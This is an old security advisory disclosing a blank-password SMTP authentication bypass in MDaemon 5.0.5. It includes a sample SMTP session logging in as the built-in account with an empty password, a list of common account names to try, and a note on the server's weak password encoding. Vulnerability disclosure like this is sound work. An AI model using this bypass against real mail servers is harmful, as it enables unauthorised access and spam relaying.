Hello,
There is a security problem on MDaemon 5.0.5 (maybe other versions
affected as well) regarding smtp authentication.
Blank password authenticates any valid user:
For primary domain:
User: VALIDUSER or VALIDUSER@primaridomain.com
Password: blank password
For secondary domains:
User: VALIDUSER@secondarydomain.com
Password: blank password
Using this vulnerability Spammers could abuse server even if relay control is
properly configured. To abuse the server there is no need to get the
userlist.dat and decode the well known weak encryption of MDeamon 5.0.6
and before (base64 encoded password plus one offset for each character
(1byte)).
If a valid user is required you could always built-in account "MDaemon" and
the default password (see references) or blank password. You could also try
with well known accounts (administrator, webmaster, info, spam, admin, etc.)
Sample session:
220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:)
TURhZW1vbg== (MDaemon)
334 UGFzc3dvcmQ6 (334 Password:)
(blank password)
235 Authentication successful
Buckaroo Banzai
PD: The bug has been submited to ALT-N
References: related security issues regarding MDaemon 5
-------------------------------------------------------
http://www.securityfocus.com/bid/4689
http://www.securityfocus.com/bid/4686
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0057.html
